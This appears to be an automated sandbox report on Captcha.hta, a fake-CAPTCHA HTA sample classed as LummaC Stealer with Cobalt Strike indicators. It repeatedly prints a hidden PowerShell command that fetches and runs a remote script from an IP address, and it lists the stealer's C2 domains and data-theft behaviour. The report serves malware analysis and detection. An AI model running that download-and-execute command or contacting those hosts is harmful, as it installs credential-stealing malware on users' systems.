Windows Analysis Report
Captcha.hta

Overview

General Information

Sample name: Captcha.hta
Analysis ID: 1573516
MD5: 21bd78bbc50aa0b32d6e8d1868e9ad5e
SHA1: 8a4278d077fa472fd6e4cbde95e6a3b928eff10b
SHA256: a5a7a72decc3a1f9bb2e0c39269f9660051a3a40c34f87789e33995b9dd2b9e1
Tags: hta, user-abuse_ch

Detection

Cobalt Strike, HTMLPhisher, LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected HtmlPhish44
Yara detected LummaC Stealer
Yara detected obfuscated html page
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7156 cmdline: mshta.exe "C:\Users\user\Desktop\Captcha.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 3616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 6632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • csc.exe (PID: 6352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1104 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • RegAsm.exe (PID: 7184 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • svchost.exe (PID: 1908 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": ["dare-curbys.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "se-blurry.biz", "print-vexer.biz", "covery-mover.biz", "formy-spill.biz", "impend-differ.biz"], "Build id": "DUkgLv--otdel"}
Source | Rule | Description | Author
Captcha.hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security
Captcha.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: powershell.exe PID: 3616 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
Process Memory Space: powershell.exe PID: 3616 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3616, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", ProcessId: 6632, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3616, TargetFilename: C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1908, ProcessName: svchost.exe

              Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3616, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", ProcessId: 6632, ProcessName: csc.exe
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-12T07:52:13.534646+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:16.055149+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:18.227210+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:20.349759+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:22.415356+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:25.613617+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:28.579229+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:33.452236+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:14.256631+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:16.781738+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:34.269240+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:14.256631+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:16.781738+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:13.534646+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:16.055149+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:18.227210+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49739 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:20.349759+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49740 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:22.415356+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49742 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:25.613617+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49746 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:28.579229+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49748 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:33.452236+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49750 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:07.811536+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 147.45.44.131 | 80 | TCP
2024-12-12T07:52:08.708627+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 147.45.44.131 | 80 | TCP
2024-12-12T07:52:11.967953+0100 | 2057973 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58954 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.432886+0100 | 2057979 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58836 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.676415+0100 | 2057977 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60620 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.188817+0100 | 2057983 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 65361 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:10.958689+0100 | 2057981 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 54123 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:19.083711+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:28.593209+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 172.67.206.64 | 443 | TCP


              AV Detection

Source: covery-mover.biz | URL Reputation: Label: malware
Source: zinc-sneark.biz | URL Reputation: Label: malware
Source: dwell-exclaim.biz | URL Reputation: Label: malware
Source: formy-spill.biz | URL Reputation: Label: malware
Source: https://covery-mover.biz:443/api | Avira URL Cloud: Label: malware
Source: https://covery-mover.biz/apia | Avira URL Cloud: Label: malware
Source: https://covery-mover.biz/apid | Avira URL Cloud: Label: malware
Source: https://covery-mover.biz/ | Avira URL Cloud: Label: malware
Source: https://covery-mover.biz/apie. | Avira URL Cloud: Label: malware
Source: https://covery-mover.biz/D | Avira URL Cloud: Label: malware
Source: https://covery-mover.biz/api | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll | Avira: detection malicious, Label: HEUR/AGEN.1300034
Source: 7.2.RegAsm.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["dare-curbys.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "se-blurry.biz", "print-vexer.biz", "covery-mover.biz", "formy-spill.biz", "impend-differ.biz"], "Build id": "DUkgLv--otdel"}
Source: Captcha.hta | ReversingLabs: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll | Joe Sandbox ML: detected
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: impend-differ.biz
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: print-vexer.biz
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: dare-curbys.biz
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: covery-mover.biz
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: formy-spill.biz
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: dwell-exclaim.biz
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: zinc-sneark.biz
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: se-blurry.biz
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: zinc-sneark.biz
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: DUkgLv--otdel
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00416B7E CryptUnprotectData, | 7_2_00416B7E

              Phishing

Source: Yara match | File source: Captcha.hta, type: SAMPLE
Source: Yara match | File source: Captcha.hta, type: SAMPLE
Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: Binary string: Automation.pdb source: powershell.exe, 00000001.00000002.1793256406.00000000084AC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.pdbx source: powershell.exe, 00000001.00000002.1781632412.0000000005BFD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1779801283.0000000003128000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.pdb source: powershell.exe, 00000001.00000002.1781632412.0000000005651000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000001.00000002.1793256406.00000000084AC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Adobe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub

              Software Vulnerabilities

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+05h] | 7_2_0040A960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h] | 7_2_00426170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push eax | 7_2_0040C36E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 7_2_0043DBD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, ecx | 7_2_00409CC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh | 7_2_0043DCF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edx], bl | 7_2_0040CE55
